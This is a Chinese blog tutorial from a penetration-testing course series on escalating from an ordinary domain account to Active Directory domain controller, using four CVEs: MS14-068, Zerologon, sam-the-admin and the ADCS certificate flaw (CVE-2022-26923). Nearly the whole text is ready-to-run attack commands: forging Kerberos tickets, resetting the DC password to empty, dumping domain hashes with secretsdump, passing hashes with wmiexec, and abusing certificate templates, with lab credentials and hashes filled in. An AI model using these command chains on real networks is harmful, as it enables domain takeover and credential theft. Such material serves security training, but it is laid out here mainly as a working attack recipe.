首页 > 其他分享 >第106天:权限提升-WIN 系统&AD域控&NetLogon&ADCS&PAC&KDC&CVE 漏洞

第106天:权限提升-WIN 系统&AD域控&NetLogon&ADCS&PAC&KDC&CVE 漏洞

时间:2024-10-12 21:44:25浏览次数:6  
标签:AD WIN 192.168 xiaodi 域控 CVE local

知识点

1、WIN-域内用户到AD域控-CVE-2014-6324
2、WIN-域内用户到AD域控-CVE-2020-1472
3、WIN-域内用户到AD域控-CVE-2021-42287
4、WIN-域内用户到AD域控-CVE-2022-26923

WIN-域控提权-CVE-2014-6324

前提条件:
1、需要域环境下一台主机普通用户账号密码
2、一台主机的管理员权限

点击查看代码
whoami /user
net time /domain
net config workstation
ms14-068.exe -u 域成员名@域名 -p 域成员密码 -s 域成员sid -d 域控制器地址
ms14-068.exe -u [email protected] -p admin!@#45 -s S-1-5-21-1218902331-2157346161-1782232778-1124 -d OWA2010CN-God.god.org
dir \\OWA2010CN-God.god.org\C$
psexec \\OWA2010CN-God.god.org cmd
CVE-2014-6324配合mimikatz拿域控主机权限

WIN-域控提权-CVE-2020-1472

CVE-2020-1472是继MS17010之后好用的NetLogon特权域控提权漏洞,影响Windows Server 2008R2至Windows Server 2019的多个版本系统,只要攻击者能访问到目标域控井且知道域控计算机名即可利用该漏洞
该漏洞不要求当前计算机在域内,也不要求当前计算机操作系统为Windows

点击查看代码
计算机名:nbtscan -v -h 192.168.3.21
漏洞检测:python3 zerologon_tester.py OWA2010CN-GOD 192.168.3.21
重置空密码:python3 cve-2020-1472-exploit.py OWA2010CN-GOD 192.168.3.21
连接后导出:python3 secretsdump.py god.org/OWA2010CN-GOD\[email protected] -no-pass
WMI连接反弹:python3 wmiexec.py god/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:ccef208c6485269c20db2cad21734fe7

WIN-域控提权-CVE-2021-42287

只需要域用户账号密码

点击查看代码
https://github.com/WazeHell/sam-the-admin
python3 sam_the_admin.py god/'mary:admin!@#45' -dc-ip 192.168.3.21 -shell

WIN-域控提权-CVE-2022-26923

前提条件:
1、一个域内普通账号
2、域内存在证书服务器

Kali添加访问域内信息 /etc/hosts
192.168.1.15 xiaodi.local
192.168.1.15 xiaodi-WIN-3C7SS32SQ6R-CA
192.168.1.15 WIN-3C7SS32SQ6R.xiaodi.local

获取CA结构名和计算机名:
certutil -config - -ping

域内信息:
192.168.1.15
test Pass123
xiaodi-WIN-3C7SS32SQ6R-CA
WIN-3C7SS32SQ6R.xiaodi.local

申请证书:
certipy req 'xiaodi.local/test:[email protected]' -ca xiaodi-WIN-3C7SS32SQ6R-CA -template User -debug

检测证书:
certipy auth -pfx test.pfx

添加用户:
python3 bloodyAD.py -d xiaodi.local -u test -p 'Pass123' --host 192.168.1.15 addComputer pwnmachine 'CVEPassword1234*'

设置属性:
python3 bloodyAD.py -d xiaodi.local -u test -p 'Pass123' --host 192.168.1.15 setAttribute 'CN=pwnmachine,CN=Computers,DC=xiaodi,DC=local' dNSHostName '["WIN-3C7SS32SQ6R.xiaodi.local"]'

申请证书:
certipy req 'xiaodi.local/pwnmachine$:CVEPassword1234*@192.168.1.15' -template Machine -dc-ip 192.168.1.15 -ca xiaodi-WIN-3C7SS32SQ6R-CA

检测证书:
certipy auth -pfx ./win-3c7ss32sq6r.pfx -dc-ip 192.168.1.15

获取HASH:
python3 secretsdump.py 'xiaodi.local/[email protected]' -hashes :10e02bef2258ad9b239e2281a01827a4

利用HASH:
python3 wmiexec.py xiaodi.local/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:e6f01fc9f2a0dc96871220f7787164bd

标签:AD,WIN,192.168,xiaodi,域控,CVE,local
From: https://www.cnblogs.com/dummy6acker/p/18461558

相关文章

  • 高级数据类型 Advanced Data
    高级数据类型AdvancedDataAdvancedData数组Arrays字符序列CharactersSequences指针Points动态内存分配数据结构DataStructures自定义数据类型Arraytype为任何objecttype//typename[elements];inta[5];intb[5]={16,2,77,40,1201};intc[]=......
  • 第105天:权限提升-Linux系统&Docker挂载&Rsync未授权&Sudo-CVE&Polkit-CVE
    演示案例Linux-Rsync未授权访问覆盖-本地Linux-Docker组用户挂载目录-本地Linux-Sudo(CVE-2021-3156)-本地Linux-Polkit(CVE-2021-4034)-本地Rsync(未授权访问)Rsync是linux下一款数据备份工具,默认开启873端口https://vulhub.org/#/environments/rsync/common/借助Linux默认......
  • [Paper Reading] TouchInsight: Uncertainty-aware Rapid Touch and Text Input for M
    目录TouchInsight:Uncertainty-awareRapidTouchandTextInputforMixedRealityfromEgocentricVisionTL;DRMethod模型中的数据流touchlocalizationLossProbabilisticcommandpredictExperimentAblation打字速度模型部署效果可视化总结与发散资料查询TouchInsight:Unc......
  • Windows系统主机连接蓝牙耳机没有声音
    前期准备如果蓝牙耳机已经连接了电脑并识别到了,只是没有声音,直接看连接蓝牙项确认蓝牙硬件能被系统识别到右击开始菜单(win+x)-设备管理器(M)-找蓝牙没找到或者看不懂没关系我也看不懂...安装蓝牙驱动浏览器搜索Windows蓝牙驱动,官网直接下载点我......
  • windterm 免安装版下载
    1、免安装版下载链接windows64位免安装版下载链接https://github.com/kingToolbox/WindTerm/releases/download/2.6.0/WindTerm_2.6.1_Windows_Portable_x86_64.zipwindows32位免安装版下载链接https://github.com/kingToolbox/WindTerm/releases/download/2.6.0/Wind......
  • TwinCAT 2软件源程序下载和上载的过程
    第一步:源程序下载在TwinCAT2PLCControl中进行源代码下载(SourceCodeDownload)操作。这通常涉及到将源代码从开发环境传输到目标控制器中。第二步:源程序导出在PLCControl中对目标控制器做过源代码下载(SourceCodeDownload)后,就可以将源代码从对应的目标控制器中上载。......
  • 【AD2426/7/8_A2B收发器技术参考手册】第四章 事件控制
    【AD2426/7/8_A2B收发器技术参考手册】第四章事件控制四,A2B事件控制4.1错误管理4.1.1下行数据错误检测4.1.2上行数据错误检测4.1.3数据时隙错误纠正4.1.4控制和响应错误处理4.1.5错误信号4.1.6A2B通信和位错误4.1.7从属节点中断处理4.1.8错误管理寄存器4.1.......
  • win软件 超强的本地视频 图片去水印 动态水印!
    AI视频图片去水印HitPawWatermarkRemover电脑软件,内涵安装教程,以后看到有水印的视频不怕啦,用这个就行了,可以去除动态水印!【下载】https://pan.quark.cn/s/1ba6f088f0b2【应用名称】:HitPawWatermarkRemover【应用版本】:2.1.2【应用大小】:263m【测试机型】pc【......
  • 自定义 http header 名称中带下划线时,可能会被 nginx 忽略删除
    在设计自定义header时,会发现如user_id这样的header无法被后端读取到想来中间有一层nginx搜了一下果然是它的影响,具体情况就不记录了,可以看参考链接。简单记录是因为下划线可能会导致一些兼容性问题,所以nginx默认不允许header名称带下划线,但也允许手动开启。解决方......
  • KMS for Windows
    I.镜像下载Windows镜像下载地址:站点1,站点2基于vlmcsd搭建KMS激活服务器vlmcsd官方激活方法:点这里果核剥壳KMS激活服务器:点这里WindowsKMS激活密钥:点这里(官方)II.手动激活参考文档:EasywaystoactivateWindows11forFREEwithoutaproductkeySlmgr.vbs脚......